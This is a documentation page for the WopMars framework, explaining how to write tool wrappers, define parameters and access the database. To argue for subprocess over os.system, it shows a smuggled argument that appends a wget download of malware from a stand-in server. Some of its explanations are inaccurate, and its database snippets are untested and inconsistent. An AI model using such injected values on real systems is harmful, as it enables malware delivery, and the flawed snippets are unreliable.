The Tool Wrappers¶
This manual aims to explain with simple words how to write the tool wrappers in order to allow a fresh Python developer to configure his own analysis workflow. This manual often refers to the Wopfile so I recommand you to keep the Wopfile section open in case of blackout.
This starting guide will allow you to understand the main mecanisms which rule WopMars. It means the way WopMars talks with the tool wrappers you are using to understand their role in the workflow in terms of input and output parameters.
To illustrate the necessary conditions to build a correct Toolwrapper, we will use some kind of TO DO task list to prevent forgetting steps. The order doesn’t matter but, I insist, each step is essential.
Developing basic tool wrappers¶
Declaring your class¶
To define a Toolwrapper we will use an important concept of the Object Oriented Programming (OOP) which is abstract inheritance.
Note
An abstract class is a class which represent a concept and, consequently, which is not supposed to be instantiated. For example, the bird concept: a bird flies and sings: an abstract class Bird
would have methods like fly
and sing
with nothing inside. Actually, there are no species called “bird”, however, there are ducks and eagles. A duck is a realization of the concept of “bird”. In OOP, the class Duck
would inherit from Bird
and would overide the methods fly
and sing
to specialize them in order to fit with the duck characteristics. Here, Duck
is a subclass of Bird
.
A Toolwrapper compatible with WopMars have to be a subclass of the abstract class, prepare yourself, Toolwrapper
! For WopMars, every Toolwrapper is a subclass of Toolwrapper
and if you ask it to work with a class which do not satisfy this simple condition, you’ll obtain an error. The reason for that is simple: if your Toolwrapper inherit from Toolwrapper
, then it is certain that it contains some methods and attributes familiar to WopMars. Otherwise, there are no guarantees.
An other important thing necessary to work with WopMars is to provide the static class attribute __mapper_args__
to your Toolwrapper. This attribute is a dictionnary which should have polymorphic_identity
as key and the full name of the class (contained in a String) as value. This information is necessary to WopMars because when it will store the tool wrappers informations into the database, WopMars will be able to keep track of the inheritance between your Toolwrapper and the Toolwrapper
class.
Note
A static class attribute is an attribute associated with a class and not with a specific object of this class. Modifying this kind of attribute in an object of a given class is somehow similar to modifying this attribute in every object of the class (those that already exist and those future).
Here is an example of the declaration of a class called SparePartsManufacturer
:
from wopmars.models.ToolWrapper import ToolWrapper
class SparePartsManufacturer(ToolWrapper):
__mapper_args__ = {
"polymorphic_identity": __module__
}
pass
You have now created your first Toolwrapper, but the aims to use abstract class inheritance is to guarantee to WopMars that each Toolwrapper
implements some methods which describe its role.
Toolwrapper specifying methods¶
A good way to see a Toolwrapper is to see it as an independant software. Meaning that it has a well defined role which is to generate a specific output in terms of a specific kinf of input with some options to parametrize its behavior. Anyway, this is the way WopMars is “watching” to the tool wrappers. The link between a Toolwrapper and WopMars is done thanks to inherited methods from Toolwrapper
which have to be re-wrote by the Toolwrapper developer.
Describing files: specify_input_file
and specif_output_file
¶
The files called input files and output files are, on the one hand, the necessary files for the tool to work and, on the other hand, the files generated by the tool. A Toolwrapper doesn’t rely on a specific file on the machine: it shouldn’t access a file in a hard-coded way but should use some kind of variable containing the path to the given file. It is for the Toolwrapper developer to specify those variable names and they have to be respected in the workflow definition file (see Wopfile section). Those variable names are known by WopMars thanks to the methods specify_input_file
(for the variable names associated with inputs) and specify_output_file
(for the variable names associated with outputs). Those methods have to return each one a list containing the Strings containing the variable names accepted by the Toolwrapper.
Warning
Every files asked by a Toolwrapper are required. It means that the processing of the Toolwrapper rely on every asked inputs and outputs. If a file is optional, you should specify it in the method specify_params
(we will see it later)
The class SparePartsManufacturer
takes a file in input but doesn’t produce any output file. The input file path will be contained in the field named “pieces”.
class SparePartsManufacturer(ToolWrapper):
__mapper_args__ = {
"polymorphic_identity": __module__
}
def specify_input_file(self):
return ["pieces"]
Describing tables: specify_input_table
and specify_output_table
¶
WopMars makes its Toolwrapper able to iterate_wopfile_yml_dic_and_insert_rules_in_db and write entries in a database. Like for the files, the tool wrappers have to specify in which table of the database they will iterate_wopfile_yml_dic_and_insert_rules_in_db (input tables) and in which they will write (output tables). So, the Toolwrapper
class implements the methods specify_input_table
and specify_output_table
. However, this time, the Strings contained in the returned list are associated with both the variables containing the table models and the name of the tables itself.
The final user have to write the same table names as keys in the table part of the definition file (see Wopfile section) and the path to the models associated with those tables as the values to specify which one the Toolwrapper should use. Usually, a Toolwrapper is closely related to a specific model but we can imagine that if two models are similar for a given Toolwrapper, it could use one or the other independantly (for example, if a model B inherit from the model A, then every Toolwrapper able to use A should be able to use B too).
Note
At the moment, the concept of model shouldn’t be clear but don’t worry, in the section concerning the models, you will get more explanations about those models. At the moment, simply note that the Toolwrapper communicate its input and output table names in the methods specify_input_table
and specify_output_table
.
Here is the rest of the Toolwrapper SparePartsManufacturer
which writes its results in the table piece
:
class SparePartsManufacturer(ToolWrapper):
__mapper_args__ = {
"polymorphic_identity": __module__
}
def specify_input_file(self):
return ["pieces"]
def specify_output_table(self):
return ["piece"]
Describing paramaters: specify_params
¶
An other feature offered by the tool wrappers is to allow you to specify some parameters for the processing of the wrapper. Usually, those parameters will be associated with the options allowed by the analysis tool itself. They may also correspond to options used by the toolwrappers to offer flexibility for the pre and post processing of the data.
To specify which options a Toolwrapper is able to understand, it implements a method specify_params
. This method returns a dictionnary in which each key correspond to the name of the option which will be used in the definition file (see Wopfile section) and each value, a String representing its type. The availables types are the following (to memorize them, just think about the different Python data types):
- int
- float
- str
- bool
Furthermore, the key word required
is available and allows to specify that one option has to be given by the user for the tool to run. To specify the type and use required
at the same time, the character |
will be used as a delimiter inside the String.
In the following class, the parameter max_price
is an int
and will be used to get only the entries with a price lower than it, if set.
class SparePartsManufacturer(ToolWrapper):
__mapper_args__ = {
"polymorphic_identity": __module__
}
def specify_input_file(self):
return ["pieces"]
def specify_output_table(self):
return ["piece"]
def specify_params(self):
return {
"max_price": int
}
Declaring the method run
¶
The run
method contains the core of your Toolwrapper. The data processing and the call to the underlying analysis tool will be done here.
Calling files: self.input_file
and self.output_file
¶
The path to the files given by the final user are manipulated thanks to the methods self.input_file
and self.output_file
with the name of the variable containing the desired file as argument. For example, in our definition file, we have:
rule Rule1:
tool: 'wrapper.SparePartsManufacturer'
input:
file:
pieces: 'input/pieces.txt'
We can access the string input/pieces.txt with the following statement:
self.input_file("pieces")
Calling models: self.input_table
and self.output_table
¶
The models given by the user can be accessed thanks to the methodes self.input_table
and self.output_table
with the table name as argument. This way, and unlike the files, you won’t get the string representing the model but the model itself. For example:
output:
table:
piece: 'model.Piece'
We can access the model Piece
with the following statement:
self.output_table("piece")
Session and accessing the database¶
If you are using WopMars, it is probably for the database access. Now, you know how to call the models from your method run
but you probably doesn’t know what to do with them. This section aims to explain how you should use your models and a session to access the database.
Note
When you are working with databases, there is three level of hierarchy of the work you are performing on it: the session, the transaction and the operation:
- The operation corresponds to each single task you are asking the database to do (
SELECT
,INSERT
,UPDATE
,DELETE
, etc.) - The transaction is a series of operations which are closely related (for example:
SELECT
, compute thenINSERT
). When a transaction finishes, the state of the database is checked, if every thing seems right and well ordered, the transaction is validated (COMMIT
), if not, the whole transaction is canceled (ROLLBACK
) in order to return to a stable state. - The session is a series of transactions which are independant. In other words, when you want to work with the database, you open a session and it says “I’m gonna work with you, database, are you ok?”. Then, every operations you will perform will be associated with __your__ session before being
COMMITED
orROLLBACKED
.
Developing Advanced tool wrappers¶
Now that you understand the basics of the development of the tool wrappers you may want to do more advanced tricks to deal with WopMars.
Parametrize inputs and outputs¶
During the parsing of the configuration file, WopMars check first the validity of the parameters and then look at the inputs and outputs. This behavior allow you to parametrize which input and output your Toolwrapper is supposed to take depending on the used parameters. In this example, the parameter to_file
is a boolean
and if it is True
, the result is written in a file instead of the database.
class CarAssembler(ToolWrapper):
__mapper_args__ = {
"polymorphic_identity": __module__
}
def specify_output_file(self):
if not self.option("to_file"):
return []
else:
return ["piece_car"]
def specify_input_table(self):
return ["piece"]
def specify_output_table(self):
if self.option("to_file"):
return []
else:
return ["piece_car"]
def specify_params(self):
return {
"to_file": "bool",
"max_price": "int",
}
And there, the definition file (Wopfile2.yml
in the example directory) look like this:
# Rule1 use SparePartsManufacturer to insert pieces informations into the table piece
rule Rule1:
tool: 'wrapper.SparePartsManufacturer'
input:
file:
pieces: 'input/pieces.txt'
output:
table:
piece: 'model.Piece'
# CarAssembler make the combinations of all possible pieces to build cars and calculate the final price
rule Rule2:
tool: 'wrapper.CarAssembler'
input:
table:
piece: 'model.Piece'
output:
# Here the output is written in a file
file:
piece_car: 'output/piece_car.txt'
params:
# The price have to be under 2000!
max_price: 2000
to_file: True
Inherit models¶
During the conception of your workflows, you may want to make multiple rules write in the same table in a specific order (for example, one rule create entries and the other add informations in the fields). Basically, you would do like ever, playing with inputs and outputs in order to fit your needs but this way, you will be stuck with a logic problem where WopMars won’t be able to say “this rule should be run before this one”, like in the following schema:

If you want the rules to be run in this specific order, WopMars can’t understand if `rule 2` is supposed to run before `rule 4` on the basis of the table names
You can bypass this issue using model inheritance. With the model inheritance, you can build a model which inherit from a former model and add it some new attributes.
Taking back our model example Piece
, we need an other model which add the field date
to the table. We call this model DatedPiece
from sqlalchemy.sql.sqltypes import Date
from sqlalchemy import Column
from model.Piece import Piece
class DatedPiece(Piece):
date = Column(Date)
With this model, there is an other Toolwrapper provided in the example: AddDateTopiece
which show use of the same table as input and output. You can note that here, the output_table only is used. Actually, we are interested here in only DatedPiece
objects:
import time, datetime
import random
from wopmars.framework.bdd.tables.ToolWrapper import ToolWrapper
class AddDateToPiece(ToolWrapper):
__mapper_args__ = {
"polymorphic_identity": __module__
}
def specify_input_table(self):
return ["piece"]
def specify_output_table(self):
return ["piece"]
def run(self):
session = self.session
DatedPiece = self.output_table("piece")
for p in self.session.query(DatedPiece).all():
date = datetime.datetime.fromtimestamp(time.time() - random.randint(1000000, 100000000))
p.date = date
session.add(p)
session.commit()
Executing clean command line¶
In your learning of Python, you may have encountered the famous os.system("command-line")
and you probably want to make use of it again. Sorry, you shouldn’t do things this way. Especially if you are running long analysis software. Instead, I’ll show you how to use the module subprocess for simple things and, please, use it extensively in order to get more control on the command lines you are executing.
Note
As far as I know, there is two main differences between os.system()
and subprocess
plus the fact that subprocess
is actually a little more difficult to use than the former:
os.system()
is very sensible to malicious code injection. Example:def list_extension(ext): os.system("ls -1 *." + str(ext))
This function is supposed to list all the files of a given extension in the directory. But if, instead of passing
txt
as argument, I passtxt; wget http://malicious.server/malware
then, the function will list the files withtxt
extension and download the malware from the malicious server!Now, with
subprocess.Popen
, you can’t do such a thing because spaces are not allowed inside arguments:def list_extension(ext): subprocess.Popen(["ls", "-1", "*." + str(ext)])
subprocess
open a Pipe between the python process and the subprocess whereasos.system
calls a subshell independant of the first. This difference makes the communication between the subprocess and your python code far more easy withsubprocess
instead ofos.system
in which it is nearly impossible
Reading/writing to the database¶
Reading and writing to the database has to be carried out through the WopMars session. The WopMars session implements a lock system to prevent database inconsistencies. There are three implemented methods to iterate_wopfile_yml_dic_and_insert_rules_in_db/write to the database with the wopmars session.
- SQLAlchemy ORM
- SQLAlchemy core
- Pandas read_sql and to_sql
SQLAlchemy ORM¶
The SQLAlchemy ORM is very simple but it is also quit slow after 100 objects. Inside the run method of the tool wrapper, we will can take a WopMars session simply with self.session and then call SQLAlchemy ORM methods on it.
# This code is for illustration purpose and has not been tested # inside the run of a tool wrapper MyWrapper def run(self): session = self.session my_input_model = self.output_table(MyWrapper.__input_table1) query_dic = {'col1': value_1, 'col2': value_2} try: # check if query_dic exists session.query(my_input_model).filter_by(**query_dic).one() except: # if not add and later commit snp_instance = snp_model(**snp_dic) session.add(snp_instance) session.commit()
SQLAlchemy core¶
Inside the run method of the tool wrapper, we need to retrieve a list of object dictionaries in the database. Then we check if new objects are not already in the database and then insert a list of such object dictionnaries.
# This code is for illustration purpose and has not been tested # inside the run of a tool wrapper MyWrapper def run(self): session = self.session engine = session._WopMarsSession__session.bind conn = engine.connect() # my_input_model = self.output_table(MyWrapper.__input_table1) # # retrieve all objects in database sql = select([my_input_model.col1]) my_input_model_in_db = [{'col1': row[0] for row in conn.execute(sql)}] # check if new col1:val1 not already in db if not {'col1': val1} in my_input_model_col1_db: # add to list of value dics my_input_model_new_objects=[{'col1': val1}] # bunch insert list of value dics engine.execute(my_input_model.__table__.insert(), [my_input_model_val1_dic])